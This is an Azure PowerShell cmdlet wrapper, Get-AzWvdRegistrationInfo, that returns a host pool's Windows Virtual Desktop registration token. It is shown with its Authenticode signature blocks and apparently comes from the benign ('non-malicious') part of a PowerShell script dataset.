# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwODU5WhcNMjQxMTE0MTkwODU5WjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQD0IPymNjfDEKg+YyE6SjDvJwKW1+pieqTjAY0CnOHZ1Nj5irGjNZPMlQ4HfxXG
# yAVCZcEWE4x2sZgam872R1s0+TAelOtbqFmoW4suJHAYoTHhkznNVKpscm5fZ899
# QnReZv5WtWwbD8HAFXbPPStW2JKCqPcZ54Y6wbuWV9bKtKPImqbkMcTejTgEAj82
# 6GQc6/Th66Koka8cUIvz59e/IP04DGrh9wkq2jIFvQ8EDegw1B4KyJTIs76+hmpV
# M5SwBZjRs3liOQrierkNVo11WuujB3kBf2CbPoP9MlOyyezqkMIbTRj4OHeKlamd
# WaSFhwHLJRIQpfc8sLwOSIBBAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUhx/vdKmXhwc4WiWXbsf0I53h8T8w
# VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh
# dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMTgzNjAfBgNVHSMEGDAW
# gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v
# d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw
# MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov
# L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx
# XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB
# AGrJYDUS7s8o0yNprGXRXuAnRcHKxSjFmW4wclcUTYsQZkhnbMwthWM6cAYb/h2W
# 5GNKtlmj/y/CThe3y/o0EH2h+jwfU/9eJ0fK1ZO/2WD0xi777qU+a7l8KjMPdwjY
# 0tk9bYEGEZfYPRHy1AGPQVuZlG4i5ymJDsMrcIcqV8pxzsw/yk/O4y/nlOjHz4oV
# APU0br5t9tgD8E08GSDi3I6H57Ftod9w26h0MlQiOr10Xqhr5iPLS7SlQwj8HW37
# ybqsmjQpKhmWul6xiXSNGGm36GarHy4Q1egYlxhlUnk3ZKSr3QtWIo1GGL03hT57
# xzjL25fKiZQX/q+II8nuG5M0Qmjvl6Egltr4hZ3e3FQRzRHfLoNPq3ELpxbWdH8t
# Nuj0j/x9Crnfwbki8n57mJKI5JVWRWTSLmbTcDDLkTZlJLg9V1BIJwXGY3i2kR9i
# 5HsADL8YlW0gMWVSlKB1eiSlK6LmFi0rVH16dde+j5T/EaQtFz6qngN7d1lvO7uk
# 6rtX+MLKG4LDRsQgBTi6sIYiKntMjoYFHMPvI/OMUip5ljtLitVbkFGfagSqmbxK
# 7rJMhC8wiTzHanBg1Rrbff1niBbnFbbV4UDmYumjs1FIpFCazk6AADXxoKCo5TsO
# zSHqr9gHgGYQC2hMyX9MGLIpowYCURx3L7kUiGbOiMwaMIIHejCCBWKgAwIBAgIK
# YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm
# aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw
# OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD
# VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG
# 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la
# UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc
# 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D
# dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+
# lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk
# kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6
# A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd
# X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL
# 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd
# sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3
# T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS
# 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI
# bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL
# BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD
# uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv
# c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF
# BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h
# cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA
# YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn
# 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7
# v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b
# pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/
# KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy
# CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp
# mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi
# hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb
# BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS
# oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL
# gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX
# cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGg0wghoJAgEBMIGVMH4x
# CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt
# b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p
# Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAOuLTVRyFOPVR0AAAAA
# A64wDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw
# HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEII0U
# DM1BtAKWDDR7WWIbG56cMKFNcaZx53lQPAzBNlR6MEIGCisGAQQBgjcCAQwxNDAy
# oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20wDQYJKoZIhvcNAQEBBQAEggEA6hcxFkSct7veyyknP+BoIu+Hdf4gRW6AN2N6
# Qw0QTVFr9f96JVeGsW7KXLDKINTbEXZldyrA4Muy96hdeqy0IJVTk4kfMoxCwL/a
# 3Cj/oR7o/2qLy1f3Q9rT/5ycxPmUdQTFsKe9xMYM22gm4Amesk0rLp4PhxeN9WKS
# w3AeCkDdWsM0SuJyZytf879QApLcJvbwHRbiAjzQqv0XCIE6T1koigIhLpQwGHZa
# PMen0+ykhVo3OHkr298lvXzbKPjqVzpDUqya596BcLGYCpRLmqj15IUueWIElldr
# D8GHSFzYxk5ciE2nlNFwZnzzUtM6GTNOw15tQCEvvYHL++QLbaGCF5cwgheTBgor
# BgEEAYI3AwMBMYIXgzCCF38GCSqGSIb3DQEHAqCCF3AwghdsAgEDMQ8wDQYJYIZI
# AWUDBAIBBQAwggFSBgsqhkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGE
# WQoDATAxMA0GCWCGSAFlAwQCAQUABCA2z7P/ei0J3gshEiKj230DTc1Vq11lHxbE
# wDNxzT5ulAIGZhfd8esuGBMyMDI0MDQyMzEzMTUxMS45MjdaMASAAgH0oIHRpIHO
# MIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQL
# ExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxk
# IFRTUyBFU046QTAwMC0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l
# LVN0YW1wIFNlcnZpY2WgghHtMIIHIDCCBQigAwIBAgITMwAAAevgGGy1tu847QAB
# AAAB6zANBgkqhkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
# aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
# cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx
# MDAeFw0yMzEyMDYxODQ1MzRaFw0yNTAzMDUxODQ1MzRaMIHLMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l
# cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046QTAwMC0w
# NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Uw
# ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDBFWgh2lbgV3eJp01oqiaF
# BuYbNc7hSKmktvJ15NrB/DBboUow8WPOTPxbn7gcmIOGmwJkd+TyFx7KOnzrxnoB
# 3huvv91fZuUugIsKTnAvg2BU/nfN7Zzn9Kk1mpuJ27S6xUDH4odFiX51ICcKl6EG
# 4cxKgcDAinihT8xroJWVATL7p8bbfnwsc1pihZmcvIuYGnb1TY9tnpdChWr9EARu
# Co3TiRGjM2Lp4piT2lD5hnd3VaGTepNqyakpkCGV0+cK8Vu/HkIZdvy+z5EL3ojT
# dFLL5vJ9IAogWf3XAu3d7SpFaaoeix0e1q55AD94ZwDP+izqLadsBR3tzjq2RfrC
# NL+Tmi/jalRto/J6bh4fPhHETnDC78T1yfXUQdGtmJ/utI/ANxi7HV8gAPzid9TY
# jMPbYqG8y5xz+gI/SFyj+aKtHHWmKzEXPttXzAcexJ1EH7wbuiVk3sErPK9MLg1X
# b6hM5HIWA0jEAZhKEyd5hH2XMibzakbp2s2EJQWasQc4DMaF1EsQ1CzgClDYIYG6
# rUhudfI7k8L9KKCEufRbK5ldRYNAqddr/ySJfuZv3PS3+vtD6X6q1H4UOmjDKdjo
# W3qs7JRMZmH9fkFkMzb6YSzr6eX1LoYm3PrO1Jea43SYzlB3Tz84OvuVSV7NcidV
# tNqiZeWWpVjfavR+Jj/JOQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFHSeBazWVcxu
# 4qT9O5jT2B+qAerhMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G
# A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv
# Y3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBs
# BggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0
# LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy
# MDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUH
# AwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQCDdN8voPd8C+VW
# ZP3+W87c/QbdbWK0sOt9Z4kEOWng7Kmh+WD2LnPJTJKIEaxniOct9wMgJ8yQywR8
# WHgDOvbwqdqsLUaM4NrertI6FI9rhjheaKxNNnBZzHZLDwlkL9vCEDe9Rc0dGSVd
# 5Bg3CWknV3uvVau14F55ESTWIBNaQS9Cpo2Opz3cRgAYVfaLFGbArNcRvSWvSUbe
# I2IDqRxC4xBbRiNQ+1qHXDCPn0hGsXfL+ynDZncCfszNrlgZT24XghvTzYMHcXio
# LVYo/2Hkyow6dI7uULJbKxLX8wHhsiwriXIDCnjLVsG0E5bR82QgcseEhxbU2d1R
# VHcQtkUE7W9zxZqZ6/jPmaojZgXQO33XjxOHYYVa/BXcIuu8SMzPjjAAbujwTawp
# azLBv997LRB0ZObNckJYyQQpETSflN36jW+z7R/nGyJqRZ3HtZ1lXW1f6zECAeP+
# 9dy6nmcCrVcOqbQHX7Zr8WPcghHJAADlm5ExPh5xi1tNRk+i6F2a9SpTeQnZXP50
# w+JoTxISQq7vBij2nitAsSLaVeMqoPi+NXlTUNZ2NdtbFr6Iir9ZK9ufaz3FxfvD
# Zo365vLOozmQOe/Z+pu4vY5zPmtNiVIcQnFy7JZOiZVDI5bIdwQRai2quHKJ6ltU
# dsi3HjNnieuE72fT4eWhxtmnN5HYCDCCB3EwggVZoAMCAQICEzMAAAAVxedrngKb
# SZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQI
# EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv
# ZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmlj
# YXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIy
# NVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT
# B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UE
# AxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEB
# AQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXI
# yjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjo
# YH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1y
# aa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v
# 3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pG
# ve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viS
# kR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYr
# bqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlM
# jgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL
# W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AF
# emzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIu
# rQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIE
# FgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWn
# G1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEW
# M2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5
# Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBi
# AEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV
# 9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3Js
# Lm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAx
# MC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v
# d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2
# LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv
# 6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZn
# OlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1
# bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4
# rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU
# 6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDF
# NLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/
# HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdU
# CbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKi
# excdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm
# dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZq
# ELQdVTNYs6FwZvKhggNQMIICOAIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJp
# Y2EgT3BlcmF0aW9uczEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkEwMDAtMDVF
# MC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMK
# AQEwBwYFKw4DAhoDFQCABol1u1wwwYgUtUowMnqYvbul3qCBgzCBgKR+MHwxCzAJ
# BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k
# MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jv
# c29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6dIswjAi
# GA8yMDI0MDQyMzEyNDkwNloYDzIwMjQwNDI0MTI0OTA2WjB3MD0GCisGAQQBhFkK
# BAExLzAtMAoCBQDp0izCAgEAMAoCAQACAiCOAgH/MAcCAQACAhLpMAoCBQDp035C
# AgEAMDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSCh
# CjAIAgEAAgMBhqAwDQYJKoZIhvcNAQELBQADggEBALwnR++F4evTR8/9iUVFiChC
# AH5sK+PsG42zTlXA7fnDdk+M7uELqLlaJX7RU6PfrxAKkyMCN++/y79mfMJvwiDM
# Yd9VPJ6iAeHPc8wbqUuAnam1sufj3B/pY+arL0rGSaGTBQ4Kvl8jTQppUReErW5K
# RBFcOfELDEwsFLaYTD/KW4Afhqy488DKDUUbkOt4adfYXhC1BQnHqQzV+sk2raZj
# /cg80vuyrkIR29PlcJKVdoH2xZ84DMA/e2gJJBn3UnPQANyaw4b6ojaAdIMt8671
# J/Nm1z04dcOX7q6o7HKMHEcsC2EOe9A3mxBC30+YiwYN1miUC2E+RKVfickz3mQx
# ggQNMIIECQIBATCBkzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3Rv
# bjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0
# aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAA
# AevgGGy1tu847QABAAAB6zANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkD
# MQ0GCyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJBDEiBCAVyv0BM4z5VyIhZrEqqgso
# YS8nW204iQGihQ5P4xyMHTCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EIM63
# a75faQPhf8SBDTtk2DSUgIbdizXsz76h1JdhLCz4MIGYMIGApH4wfDELMAkGA1UE
# BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc
# BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0
# IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAHr4BhstbbvOO0AAQAAAeswIgQgdp8J
# l1s8iM14llKg2SCG18dqUIGTHEUl2ZdAhVhNPYMwDQYJKoZIhvcNAQELBQAEggIA
# N/ap3vDEU5PnDleYasAYZLZtHpyY9u8DI2P4ytzAoOEMKRVeHw0UvhF9m3d9aCzG
# xoJVGlqasgsqO5TsyEgDay3sDkTIBwuiA2YU0slnUxl9iJe68mQApxHK78HCoodi
# 7DlHqwOHnmTm1KSpZakwIwRKphzhb0zx3cQQ+xusb9J85+iTlLNDs0DTngPqjhXw
# XhIb/N/elgdgvAHun3CP7VeDcngYImBMfh4dSmE/EGZcEGjMlWD/rfge9PXBvwr9
# lYDcXs4ZpCYe3dE/l/tfrmCWrvZ1pgKZ+n7nbgZVEZ3Uve9z/Ki5b548Z+kvWluo
# l1HIoYrzOpYQ/8GjSeUPJK8FcrmBNcuZ2ok3AFCTtTDaI2VJ1dZUfiFQxlWIdXgb
# kX/UHI9vUT9UjXtUBGUJnRaOt5P7SU0aPZbcBogZ+QQtxSi3FxItXy3KOxzxHkH1
# jryiZgero3FSIx3H+qGPJgjVsQeZ6ep7RfSwZlyihjT/O0pADNuqadYZwaUlsYw5
# ip0QjeWHX4P2Y470Vw4zGka86RUU65X1BF/O5P3/nmD968I/loKBZXyUFN+GBtOI
# fI00dEVL7+r0LaW5kB5lnpUQoZhowqlyvUHoi6omeAnU5PfgAluWux9aPCuVjK8S
# LYHVCJlbTgg3ZuTV6V64XNMoc9FzoTyT11x54xkghOc=
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_41_19.ps1
|
sample_41_19.ps1
|
# ----------------------------------------------------------------------------------
#
# Copyright Microsoft Corporation
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------------
<#
.Synopsis
Get the Windows virtual desktop registration info.
.Description
Get the Windows virtual desktop registration info.
#>
function Get-AzWvdRegistrationInfo {
[OutputType('Microsoft.Azure.PowerShell.Cmdlets.DesktopVirtualization.Models.Api20230905.RegistrationInfo')]
[CmdletBinding(PositionalBinding=$false)]
param(
[Parameter()]
[Alias('AzureRMContext', 'AzureCredential')]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.DesktopVirtualization.Category('Azure')]
[System.Management.Automation.PSObject]
# The credentials, account, tenant, and subscription used for communication with Azure.
${DefaultProfile},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.DesktopVirtualization.Category('Runtime')]
[System.Management.Automation.SwitchParameter]
# Wait for .NET debugger to attach
${Break},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.DesktopVirtualization.Category('Runtime')]
[Microsoft.Azure.PowerShell.Cmdlets.DesktopVirtualization.Runtime.SendAsyncStep[]]
# SendAsync Pipeline Steps to be appended to the front of the pipeline
${HttpPipelineAppend},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.DesktopVirtualization.Category('Runtime')]
[Microsoft.Azure.PowerShell.Cmdlets.DesktopVirtualization.Runtime.SendAsyncStep[]]
# SendAsync Pipeline Steps to be prepended to the front of the pipeline
${HttpPipelinePrepend},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.DesktopVirtualization.Category('Runtime')]
[System.Uri]
# The URI for the proxy server to use
${Proxy},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.DesktopVirtualization.Category('Runtime')]
[System.Management.Automation.PSCredential]
# Credentials for a proxy server to use for the remote call
${ProxyCredential},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.DesktopVirtualization.Category('Runtime')]
[System.Management.Automation.SwitchParameter]
# Use the default credentials for the proxy
${ProxyUseDefaultCredentials},
[Parameter(Mandatory, HelpMessage='Subscription Id')]
[Microsoft.Azure.PowerShell.Cmdlets.DesktopVirtualization.Category('Path')]
[Microsoft.Azure.PowerShell.Cmdlets.DesktopVirtualization.Runtime.DefaultInfo(Script='(Get-AzContext).Subscription.Id')]
[System.String]
${SubscriptionId},
[Parameter(Mandatory, HelpMessage='Resource Group Name')]
[Microsoft.Azure.PowerShell.Cmdlets.DesktopVirtualization.Category('Path')]
[System.String]
${ResourceGroupName},
[Parameter(Mandatory, HelpMessage='Host Pool Name')]
[Microsoft.Azure.PowerShell.Cmdlets.DesktopVirtualization.Category('Path')]
[System.String]
${HostPoolName}
)
process {
$registrationInfo = Az.DesktopVirtualization\Get-AzWvdHostPoolRegistrationToken @PSBoundParameters
$registrationInfo
}
}
# SIG # Begin signature block
# MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor
